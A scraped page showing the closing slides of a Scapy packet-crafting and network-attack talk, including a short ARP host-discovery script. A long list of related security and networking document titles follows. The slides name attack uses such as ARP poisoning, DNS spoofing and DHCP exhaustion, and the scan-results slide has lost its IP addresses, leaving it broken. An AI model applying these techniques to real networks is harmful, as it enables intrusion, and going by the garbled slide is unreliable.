161 Sliced Network Scan Results Interpretation : next slice One shots Scanning TTL tricks TTL= RA 6482 RA 6483 RA 6484 RA RA 3944 SA 6485 RA 3945 RA RA RA RA RA RA Ports 80 and 443 of are not reached but is reached = we have a Destination NAT IP ID suggest that is NATed by does not exist (did not answer to router s ARP request) ,77 are claimed (answer to router s ARP request) but drop packets Packet generation and network based attacks with
162 Conclusion Some supported protocols ARP, BOOTP, DHCP, DNS, , WEP, 802.3, Ethernet, 802.1q, LLC, SNAP, EAP, HSRP, IP, UDP, TCP, ISAKMP, NTP, PPPoE, Prism Headers, RIP, STP, Sebek, Skinny,... Some applications ARP cache poisonning, VLAN hopping, DNS spoofing, OS fingerprinting, DoSing, Dynamic DNS updates, traceroutes, scanning, network discovery, Access Point Spoofing, Wi-Fi signal strength measuring, DHCP server, DHCP spoofing, DHCP exhaustion,... Packet generation and network based attacks with
163 Conclusion Limitations Introduction Can t handle too many packets. Won t replace nmap. Don t interpret for you. You must know what you re doing. Stimulus/response(s) model. Won t replace netcat, socat,...easily Packet generation and network based attacks with
164 Conclusion Pros has its own ARP stack and its own routing table. works the same for layer 2 and layer 3 bypasses local firewalls Fast packet designing Default values that work Unlimited combinations Probe once, interpret many Interactive packet and result manipulation = Extremely powerful architecture for your craziest dreams (I hope so!) Packet generation and network based attacks with
165 The End Introduction That s all folks! Thanks for your attention. You can reach me at [email protected] These slides are online at Packet generation and network based attacks with
166 References External script Appendices 5 References 6 External script Packet generation and network based attacks with
167 References External script References I P. Biondi, Ed3f, 2002, Firewall spotting with broken CRC, Phrack 60 Ofir Arkin and Josh Anderson, Etherleak: Ethernet frame padding information leakage, P. Biondi, 2002 Linux Netfilter NAT/ICMP code information leak Packet generation and network based attacks with
168 References External script References II P. Biondi, 2003 Linux 2.0 remote info leak from too big icmp citation Packet generation and network based attacks with
169 References External script External script #! /usr/bin/env python import sys i f len ( sys. argv )!= 2: print "Usage: arping <net>\n eg: arping /24" sys. exit (1) from scapy import srp, Ether, ARP, conf conf. verb=0 ans, unans=srp ( Ether ( dst="ff:ff:ff:ff:ff:ff") /ARP( pdst=sys. argv [ 1 ] ), timeout =2) for s, r in ans : print r. s p r i n t f ("%Ether.src% %ARP.psrc%") Packet generation and network based attacks with
Network packet forgery with Scapy
Philippe BIONDI Network packet forgery with 1/109 Network packet forgery with Philippe BIONDI phil(at)secdev.org / philippe.biondi(at)eads.net EADS Corporate Research Center SSI Department Suresnes, FRANCE
Scapy. On-the-fly Packet Generation by [email protected]. Dienstag, 10. Januar 12
Scapy On-the-fly Packet Generation by [email protected] 1 Overview Repetition of network basics Python Basics Scapy Basics Example: SYN Scan Hands-on: Traceroute Promiscuous Scan ARP Spoofing 2 Layers
Introduction Présentation de scapy. Scapy. Easy Packet Handling. Etienne Maynier. [email protected]. Capitole du Libre 24 Novembre 2012
Easy Packet Handling [email protected] Capitole du Libre 24 Novembre 2012 Manipulation de paquets : Pour des tests réseau Pour de l éducation Principalement pour des tests de sécurité Développé
Host Fingerprinting and Firewalking With hping
Host Fingerprinting and Firewalking With hping Naveed Afzal National University Of Computer and Emerging Sciences, Lahore, Pakistan Email: [email protected] Naveedafzal gmail.com Abstract: The purpose
Scanning Tools. Scan Types. Network sweeping - Basic technique used to determine which of a range of IP addresses map to live hosts.
Scanning Tools The goal of the scanning phase is to learn more information about the target environment and discover openings by interacting with that target environment. This paper will look at some of
Hacking Techniques & Intrusion Detection. Ali Al-Shemery arabnix [at] gmail
![Hacking Techniques & Intrusion Detection. Ali Al-Shemery arabnix [at] gmail](/thumbs/26/8252225.jpg "Hacking Techniques & Intrusion Detection. Ali Al-Shemery arabnix [at] gmail")
Hacking Techniques & Intrusion Detection Ali Al-Shemery arabnix [at] gmail All materials is licensed under a Creative Commons Share Alike license. http://creativecommons.org/licenses/by-sa/3.0/ 2 # whoami
Troubleshooting Tools
Troubleshooting Tools An overview of the main tools for verifying network operation from a host Fulvio Risso Mario Baldi Politecnico di Torino (Technical University of Turin) see page 2 Notes n The commands/programs
Host Discovery with nmap
Host Discovery with nmap By: Mark Wolfgang [email protected] November 2002 Table of Contents Host Discovery with nmap... 1 1. Introduction... 3 1.1 What is Host Discovery?... 4 2. Exploring nmap s Default
----------------------------------------------------------------------------------------------------------------------
The basic commands for the firewall: 1. Command firewalllog -- To check the firewall logs and to find out source, destination, ports, request is passing or blocking and matching firewall rule no. etc superuser@securegate
Why use Scapy? Blue Team. Red Team. Test IDS/IPS Test Firewall Learn more about TCP/IP (down and dirty) Application response(fuzzing)
Scapy What is Scapy Why use Scapy? Important concepts to keep in mind Crafting your first packet Sending and Receiving Packets/Frames Basic examples and dealing with the OS's TCP/IP stack using iptables
Internet Protocol: IP packet headers. vendredi 18 octobre 13
Internet Protocol: IP packet headers 1 IPv4 header V L TOS Total Length Identification F Frag TTL Proto Checksum Options Source address Destination address Data (payload) Padding V: Version (IPv4 ; IPv6)
Innominate mguard Version 6
Innominate mguard Version 6 Application Note: Firewall Logging mguard smart mguard PCI mguard blade mguard industrial RS EAGLE mguard mguard delta Innominate Security Technologies AG Albert-Einstein-Str.
Unix System Administration
Unix System Administration Chris Schenk Lecture 08 Tuesday Feb 13 CSCI 4113, Spring 2007 ARP Review Host A 128.138.202.50 00:0B:DB:A6:76:18 Host B 128.138.202.53 00:11:43:70:45:81 Switch Host C 128.138.202.71
Technical Support Information Belkin internal use only
The fundamentals of TCP/IP networking TCP/IP (Transmission Control Protocol / Internet Protocols) is a set of networking protocols that is used for communication on the Internet and on many other networks.
Network Packet Analysis and Scapy Introduction
Copyright: The development of this document is funded by Higher Education of Academy. Permission is granted to copy, distribute and /or modify this document under a license compliant with the Creative
Introduction to Analyzer and the ARP protocol
Laboratory 6 Introduction to Analyzer and the ARP protocol Objetives Network monitoring tools are of interest when studying the behavior of network protocols, in particular TCP/IP, and for determining
Understanding and Configuring NAT Tech Note PAN-OS 4.1
Understanding and Configuring NAT Tech Note PAN-OS 4.1 Revision C 2012, Palo Alto Networks, Inc. www.paloaltonetworks.com Contents Overview... 3 Scope... 3 Design Consideration... 3 Software requirement...
Remote Network Analysis
Remote Network Analysis Torsten Hoefler [email protected] (DMZ), mostly between two packet filters and application gateways. The different possibilities to connect DMZ-hosts are also shown in Figure
Passive Network Traffic Analysis: Understanding a Network Through Passive Monitoring Kevin Timm,
Passive Network Traffic Analysis: Understanding a Network Through Passive Monitoring Kevin Timm, Network IDS devices use passive network monitoring extensively to detect possible threats. Through passive
What is a DoS attack?
CprE 592-YG Computer and Network Forensics Log-based Signature Analysis Denial of Service Attacks - from analyst s point of view Yong Guan 3216 Coover Tel: (515) 294-8378 Email: [email protected] October
Subnetting,Supernetting, VLSM & CIDR
Subnetting,Supernetting, VLSM & CIDR WHAT - IP Address Unique 32 or 128 bit Binary, used to identify a system on a Network or Internet. Network Portion Host Portion CLASSFULL ADDRESSING IP address space
Linux Network Security
Linux Network Security Course ID SEC220 Course Description This extremely popular class focuses on network security, and makes an excellent companion class to the GL550: Host Security course. Protocols
Presentation_ID. 2001, Cisco Systems, Inc. All rights reserved.
Presentation_ID 2001, Cisco Systems, Inc. All rights reserved. 1 IPv6 Security Considerations Patrick Grossetete [email protected] Dennis Vogel [email protected] 2 Agenda Native security in IPv6 IPv6 challenges
CSCE 465 Computer & Network Security
CSCE 465 Computer & Network Security Instructor: Dr. Guofei Gu http://courses.cse.tamu.edu/guofei/csce465/ Vulnerability Analysis 1 Roadmap Why vulnerability analysis? Example: TCP/IP related vulnerabilities
Network Traffic Analysis
2013 Network Traffic Analysis Gerben Kleijn and Terence Nicholls 6/21/2013 Contents Introduction... 3 Lab 1 - Installing the Operating System (OS)... 3 Lab 2 Working with TCPDump... 4 Lab 3 - Installing
netkit lab MPLS VPNs with overlapping address spaces 1.0 S.Filippi, L.Ricci, F.Antonini Version Author(s)
netkit lab MPLS VPNs with overlapping address spaces Version Author(s) 1.0 S.Filippi, L.Ricci, F.Antonini E-mail Web Description [email protected] http://www.kaksonetworks.it/ A lab showing
Policy Based Forwarding
Policy Based Forwarding Tech Note PAN-OS 4.1 Revision A 2012, Palo Alto Networks, Inc. www.paloaltonetworks.com Contents Overview... 3 Security... 3 Performance... 3 Symmetric Routing... 3 Service Versus
Lab 2. CS-335a. Fall 2012 Computer Science Department. Manolis Surligas [email protected]
Lab 2 CS-335a Fall 2012 Computer Science Department Manolis Surligas [email protected] 1 Summary At this lab we will cover: Basics of Transport Layer (TCP, UDP) Broadcast ARP DNS More Wireshark filters
Guide to Network Defense and Countermeasures Third Edition. Chapter 2 TCP/IP
Guide to Network Defense and Countermeasures Third Edition Chapter 2 TCP/IP Objectives Explain the fundamentals of TCP/IP networking Describe IPv4 packet structure and explain packet fragmentation Describe
Procedure: You can find the problem sheet on Drive D: of the lab PCs. 1. IP address for this host computer 2. Subnet mask 3. Default gateway address
Objectives University of Jordan Faculty of Engineering & Technology Computer Engineering Department Computer Networks Laboratory 907528 Lab.4 Basic Network Operation and Troubleshooting 1. To become familiar
IP network tools & troubleshooting. AFCHIX 2010 Nairobi, Kenya October 2010
IP network tools & troubleshooting AFCHIX 2010 Nairobi, Kenya October 2010 Network configuration Reminder, configure your network in /etc/ rc.conf ( x = your IP, from.10 to...) ifconfig_bge0= 41.215.76.x/24
Networks: IP and TCP. Internet Protocol
Networks: IP and TCP 11/1/2010 Networks: IP and TCP 1 Internet Protocol Connectionless Each packet is transported independently from other packets Unreliable Delivery on a best effort basis No acknowledgments
Packet filtering with Linux
LinuxFocus article number 289 http://linuxfocus.org Packet filtering with Linux by Vincent Renardias About the author: GNU/Linux user since 1993, Vincent Renardias started to
Computer Networks. Lecture 3: IP Protocol. Marcin Bieńkowski. Institute of Computer Science University of Wrocław
Computer Networks Lecture 3: IP Protocol Marcin Bieńkowski Institute of Computer Science University of Wrocław Computer networks (II UWr) Lecture 3 1 / 24 In previous lectures We learned about layer 1
Lecture Computer Networks
Prof. Dr. H. P. Großmann mit M. Rabel sowie H. Hutschenreiter und T. Nau Sommersemester 2012 Institut für Organisation und Management von Informationssystemen Thomas Nau, kiz Lecture Computer Networks
8.2 The Internet Protocol
TCP/IP Protocol Suite HTTP SMTP DNS RTP Distributed applications Reliable stream service TCP UDP User datagram service Best-effort connectionless packet transfer Network Interface 1 IP Network Interface
Internetworking. Problem: There is more than one network (heterogeneity & scale)
Internetworking Problem: There is more than one network (heterogeneity & scale) Hongwei Zhang http://www.cs.wayne.edu/~hzhang Internetworking: Internet Protocol (IP) Routing and scalability Group Communication
netkit lab static-routing Università degli Studi Roma Tre Dipartimento di Informatica e Automazione Computer Networks Research Group
Università degli Studi Roma Tre Dipartimento di Informatica e Automazione Computer Networks Research Group netkit lab static-routing Version Author(s) E-mail Web Description 2.2 G. Di Battista, M. Patrignani,
Internet Firewall CSIS 3230. Internet Firewall. Spring 2012 CSIS 4222. net13 1. Firewalls. Stateless Packet Filtering
Internet Firewall CSIS 3230 A combination of hardware and software that isolates an organization s internal network from the Internet at large Ch 8.8: Packet filtering, firewalls, intrusion detection Ch
Network and Services Discovery
A quick theorical introduction to network scanning January 8, 2016 Disclaimer/Intro Disclaimer/Intro Network scanning is not exact science When an information system is able to interact over the network
Tools for Attacking Layer 2 Network Infrastructure
Tools for Attacking Layer 2 Network Infrastructure Kai-Hau Yeung, Dereck Fung, and Kin-Yeung Wong Abstract Data Link layer is considered as the weakest link in a secured network. If an initial attack comes
Network Security. Chapter 3. Cornelius Diekmann. Version: October 21, 2015. Lehrstuhl für Netzarchitekturen und Netzdienste Institut für Informatik
Network Security Chapter 3 Cornelius Diekmann Lehrstuhl für Netzarchitekturen und Netzdienste Institut für Informatik Version: October 21, 2015 IN2101, WS 15/16, Network Security 1 Security Policies and
Looking for Trouble: ICMP and IP Statistics to Watch
Looking for Trouble: ICMP and IP Statistics to Watch Laura Chappell, Senior Protocol Analyst Protocol Analysis Institute [[email protected]] www.packet-level.com www.podbooks.com HTCIA Member,
Information Security Training. Assignment 1 Networking
Information Security Training Assignment 1 Networking By Justin C. Klein Keane September 28, 2012 Assignment 1 For this assignment you will utilize several networking utilities
1. LAB SNIFFING LAB ID: 10
H E R A LAB ID: 10 SNIFFING Sniffing in a switched network ARP Poisoning Analyzing a network traffic Extracting files from a network trace Stealing credentials Mapping/exploring network resources 1. LAB
Unverified Fields - A Problem with Firewalls & Firewall Technology Today
Unverified Fields - A Problem with Firewalls & Firewall Technology Today Ofir Arkin The Sys-Security Group [email protected] October 2000 1 Introduction The following problem (as discussed in
Network layer: Overview. Network layer functions IP Routing and forwarding
Network layer: Overview Network layer functions IP Routing and forwarding 1 Network layer functions Transport packet from sending to receiving hosts Network layer protocols in every host, router application
Using IPM to Measure Network Performance
CHAPTER 3 Using IPM to Measure Network Performance This chapter provides details on using IPM to measure latency, jitter, availability, packet loss, and errors. It includes the following sections: Measuring
Packet Sniffers Submitted in partial fulfillment of the requirement for the award of degree Of MCA
A Seminar report On Packet Sniffers Submitted in partial fulfillment of the requirement for the award of degree Of MCA SUBMITTED TO: www.studymafia.org SUBMITTED BY: www.studymafia.org Preface I have made
Firewall implementation and testing
Firewall implementation and testing Patrik Ragnarsson, Niclas Gustafsson E-mail: [email protected], [email protected] Supervisor: David Byers, [email protected] Project Report for Information
NETWORK SECURITY WITH OPENSOURCE FIREWALL
NETWORK SECURITY WITH OPENSOURCE FIREWALL Vivek Kathayat,Dr Laxmi Ahuja AIIT Amity University,Noida [email protected] [email protected] ATTACKER SYSTEM: Backtrack 5r3( 192.168.75.10 ) HOST: Backtrack
Outline. CSc 466/566. Computer Security. 18 : Network Security Introduction. Network Topology. Network Topology. Christian Collberg
Outline Network Topology CSc 466/566 Computer Security 18 : Network Security Introduction Version: 2012/05/03 13:59:29 Department of Computer Science University of Arizona [email protected] Copyright
2057-15. First Workshop on Open Source and Internet Technology for Scientific Environment: with case studies from Environmental Monitoring
2057-15 First Workshop on Open Source and Internet Technology for Scientific Environment: with case studies from Environmental Monitoring 7-25 September 2009 TCP/IP Networking Abhaya S. Induruwa Department
Firewall Testing. Cameron Kerr Telecommunications Programme University of Otago. May 16, 2005
Firewall Testing Cameron Kerr Telecommunications Programme University of Otago May 16, 2005 Abstract Writing a custom firewall is a complex task, and is something that requires a significant amount of
Recent advances in IPv6 insecurities Marc van Hauser Heuse Deepsec 2010, Vienna. 2010 Marc Heuse <[email protected]>
Recent advances in IPv6 insecurities Marc van Hauser Heuse Deepsec 2010, Vienna 2010 Marc Heuse Hello, my name is The future is here already Let s start with the basics IPv4 4 octets 4.294.967.296
Instructor Notes for Lab 3
Instructor Notes for Lab 3 Do not distribute instructor notes to students! Lab Preparation: Make sure that enough Ethernet hubs and cables are available in the lab. The following tools will be used in
Introduction to Passive Network Traffic Monitoring
Introduction to Passive Network Traffic Monitoring CS459 ~ Internet Measurements Spring 2015 Despoina Antonakaki [email protected] Active Monitoring Inject test packets into the network or send packets
Network Scanning. What is a Network scanner? Why are scanners needed? How do scanners do? Which scanner does the market provide?
Network Scanning What is a Network scanner? Why are scanners needed? How do scanners do? Which scanner does the market provide? Where will our research go? Page : 1 Function - attacker view What hosts
Tools for penetration tests 1. Carlo U. Nicola, HT FHNW With extracts from documents of : Google; Wireshark; nmap; Nessus.
Tools for penetration tests 1 Carlo U. Nicola, HT FHNW With extracts from documents of : Google; Wireshark; nmap; Nessus. What is a penetration test? Goals: 1. Analysis of an IT-environment and search
CONNECTING WINDOWS XP PROFESSIONAL TO A NETWORK
1 Chapter 10 CONNECTING WINDOWS XP PROFESSIONAL TO A NETWORK Chapter 10: CONNECTING WINDOWS XP PROFESSIONAL TO A NETWORK 2 OVERVIEW Configure and troubleshoot the TCP/IP protocol Connect to a wireless
Software Defined Networking (SDN) - Open Flow
Software Defined Networking (SDN) - Open Flow Introduction Current Internet: egalitarian routing/delivery based on destination address, best effort. Future Internet: criteria based traffic management,
Laboratory work 4. Application of Windows OS Built-in Networks Diagnostic Tools
Laboratory work 4 Application of Windows OS Built-in Networks Diagnostic Tools Objectives Get acquainted with Windows OS command-line network diagnostic, monitoring and management tools and their application
Outline. Outline. Outline
Network Forensics: Network Prefix Scott Hand September 30 th, 2011 1 What is network forensics? 2 What areas will we focus on today? Basics Some Techniques What is it? OS fingerprinting aims to gather
https://elearn.zdresearch.com https://training.zdresearch.com/course/pentesting
https://elearn.zdresearch.com https://training.zdresearch.com/course/pentesting Chapter 1 1. Introducing Penetration Testing 1.1 What is penetration testing 1.2 Different types of test 1.2.1 External Tests
During your session you will have access to the following lab configuration. CLIENT1 (Windows XP Workstation) 192.168.0.2 /24
Introduction The Network Vulnerabilities module provides you with the instruction and Server hardware to develop your hands on skills in the defined topics. This module includes the following exercises:
Port Scanning and Vulnerability Assessment. ECE4893 Internetwork Security Georgia Institute of Technology
Port Scanning and Vulnerability Assessment ECE4893 Internetwork Security Georgia Institute of Technology Agenda Reconnaissance Scanning Network Mapping OS detection Vulnerability assessment Reconnaissance
Network Security. Marcus Bendtsen Institutionen för Datavetenskap (IDA) Avdelningen för Databas- och Informationsteknik (ADIT)
Network Security ICMP, TCP, DNS, Scanning Marcus Bendtsen Institutionen för Datavetenskap (IDA) Avdelningen för Databas- och Informationsteknik (ADIT) Agenda A couple of examples of network protocols that
Network Security TCP/IP Refresher
Network Security TCP/IP Refresher What you (at least) need to know about networking! Dr. David Barrera Network Security HS 2014 Outline Network Reference Models Local Area Networks Internet Protocol (IP)
NETWORK LAYER/INTERNET PROTOCOLS
CHAPTER 3 NETWORK LAYER/INTERNET PROTOCOLS You will learn about the following in this chapter: IP operation, fields and functions ICMP messages and meanings Fragmentation and reassembly of datagrams IP
IP Network Layer. Datagram ID FLAG Fragment Offset. IP Datagrams. IP Addresses. IP Addresses. CSCE 515: Computer Network Programming TCP/IP
CSCE 515: Computer Network Programming TCP/IP IP Network Layer Wenyuan Xu Department of Computer Science and Engineering University of South Carolina IP Datagrams IP is the network layer packet delivery
CYBER ATTACKS EXPLAINED: PACKET CRAFTING
CYBER ATTACKS EXPLAINED: PACKET CRAFTING Protect your FOSS-based IT infrastructure from packet crafting by learning more about it. In the previous articles in this series, we explored common infrastructure
Lecture 17 - Network Security
Lecture 17 - Network Security CMPSC 443 - Spring 2012 Introduction Computer and Network Security Professor Jaeger www.cse.psu.edu/~tjaeger/cse443-s12/ Idea Why donʼt we just integrate some of these neat
co Characterizing and Tracing Packet Floods Using Cisco R
co Characterizing and Tracing Packet Floods Using Cisco R Table of Contents Characterizing and Tracing Packet Floods Using Cisco Routers...1 Introduction...1 Before You Begin...1 Conventions...1 Prerequisites...1
IP addressing and forwarding Network layer
The Internet Network layer Host, router network layer functions: IP addressing and forwarding Network layer Routing protocols path selection RIP, OSPF, BGP Transport layer: TCP, UDP forwarding table IP
A1.1.1.11.1.1.2 1.1.1.3S B
CS Computer 640: Network AdityaAkella Lecture Introduction Networks Security 25 to Security DoS Firewalls and The D-DoS Vulnerabilities Road Ahead Security Attacks Protocol IP ICMP Routing TCP Security
Chapter 8 Security Pt 2
Chapter 8 Security Pt 2 IC322 Fall 2014 Computer Networking: A Top Down Approach 6 th edition Jim Kurose, Keith Ross Addison-Wesley March 2012 All material copyright 1996-2012 J.F Kurose and K.W. Ross,
Linux Routers and Community Networks
Summer Course at Mekelle Institute of Technology. July, 2015. Linux Routers and Community Networks Llorenç Cerdà-Alabern http://personals.ac.upc.edu/llorenc [email protected] Universitat Politènica de
Security Technology White Paper
Security Technology White Paper Issue 01 Date 2012-10-30 HUAWEI TECHNOLOGIES CO., LTD. 2012. All rights reserved. No part of this document may be reproduced or transmitted in any form or by any means without
CSE 127: Computer Security. Network Security. Kirill Levchenko
CSE 127: Computer Security Network Security Kirill Levchenko December 4, 2014 Network Security Original TCP/IP design: Trusted network and hosts Hosts and networks administered by mutually trusted parties
Remote Network Analysis
Remote Network Analysis - I know what you know - Torsten Höfler [email protected] Torsten Höfler, 21. November 2004 Remote Network Analysis - p. 1/41 Outline 1. 2. 3. 4. Advanced Scanning 5. 6. Torsten
Voice over IP. Demonstration 1: VoIP Protocols. Network Environment
Voice over IP Demonstration 1: VoIP Protocols Network Environment We use two Windows workstations from the production network, both with OpenPhone application (figure 1). The OpenH.323 project has developed
Project 2: Firewall Design (Phase I)
Project 2: Firewall Design (Phase I) CS 161 - Joseph/Tygar November 12, 2006 1 Edits If we need to make clarifications or corrections to this document after distributing it, we will post a new version
2. IP Networks, IP Hosts and IP Ports
1. Introduction to IP... 1 2. IP Networks, IP Hosts and IP Ports... 1 3. IP Packet Structure... 2 4. IP Address Structure... 2 Network Portion... 2 Host Portion... 3 Global vs. Private IP Addresses...3
Network Management and Debugging. Jing Zhou
Network Management and Debugging Jing Zhou Network Management and Debugging Network management generally includes following task: Fault detection for networks, gateways and critical servers Schemes for
OLD VULNERABILITIES IN NEW PROTOCOLS? HEADACHES ABOUT IPV6 FRAGMENTS
OLD VULNERABILITIES IN NEW PROTOCOLS? HEADACHES ABOUT IPV6 FRAGMENTS Eric Vyncke (@evyncke) Cisco Session ID: ARCH W01 Session Classification: Advanced Agenda Status of WorldWide IPv6 Deployment IPv6 refresher:
Network Layer: and Multicasting. 21.1 Copyright The McGraw-Hill Companies, Inc. Permission required for reproduction or display.
Chapter 21 Network Layer: Address Mapping, Error Reporting, and Multicasting 21.1 Copyright The McGraw-Hill Companies, Inc. Permission required for reproduction or display. 21-1 ADDRESS MAPPING The delivery
Ulogd2, Advanced firewall logging
Ulogd2, Advanced firewall logging INL 172 rue de Charonne 75011 Paris, France RMLL 2009, July 8, Nantes Ulogd2, Netfilter logging reloaded 1/ 38 Some words about me NuFW main developper INL co-founder
netkit lab two-hosts Università degli Studi Roma Tre Dipartimento di Informatica e Automazione Computer Networks Research Group
Università degli Studi Roma Tre Dipartimento di Informatica e Automazione Computer Networks Research Group netkit lab two-hosts Version Author(s) E-mail Web Description 2.2 G. Di Battista, M. Patrignani,
Firewalls, NAT and Intrusion Detection and Prevention Systems (IDS)
Firewalls, NAT and Intrusion Detection and Prevention Systems (IDS) Internet (In)Security Exposed Prof. Dr. Bernhard Plattner With some contributions by Stephan Neuhaus Thanks to Thomas Dübendorfer, Stefan
Session Hijacking Exploiting TCP, UDP and HTTP Sessions
Session Hijacking Exploiting TCP, UDP and HTTP Sessions Shray Kapoor [email protected] Preface With the emerging fields in e-commerce, financial and identity information are at a higher risk of being
Overview of TCP/IP. TCP/IP and Internet
Overview of TCP/IP System Administrators and network administrators Why networking - communication Why TCP/IP Provides interoperable communications between all types of hardware and all kinds of operating
Sniffing in a Switched Network
Sniffing in a Switched Network -With A Recipe To Hack A Switch Using Ettercap and Ethereal -Manu Garg manugarg at gmail dot com Problem Statement- To gain access to main switch of your company using a
CIT 380: Securing Computer Systems
CIT 380: Securing Computer Systems Scanning CIT 380: Securing Computer Systems Slide #1 Topics 1. Port Scanning 2. Stealth Scanning 3. Version Identification 4. OS Fingerprinting 5. Vulnerability Scanning
ACHILLES CERTIFICATION. SIS Module SLS 1508
ACHILLES CERTIFICATION PUBLIC REPORT Final DeltaV Report SIS Module SLS 1508 Disclaimer Wurldtech Security Inc. retains the right to change information in this report without notice. Wurldtech Security
Internet Protocols Fall 2005. Lectures 7-8 Andreas Terzis
Internet Protocols Fall 2005 Lectures 7-8 Andreas Terzis Outline Internet Protocol Service Model Fragmentation Addressing Original addressing scheme Subnetting CIDR Forwarding ICMP ARP Address Shortage
Practical Network Forensics
BCS-ISSG Practical Network Forensics Day BCS, London Practical Network Forensics Alan Woodroffe [email protected] www.securesystemssupport.co.uk Copyright Secure Systems Support Limited.
IPv6 Hardening Guide for Windows Servers
IPv6 Hardening Guide for Windows Servers How to Securely Configure Windows Servers to Prevent IPv6-related Attacks Version: 1.0 Date: 22/12/2014 Classification: Public Author(s): Antonios Atlasis TABLE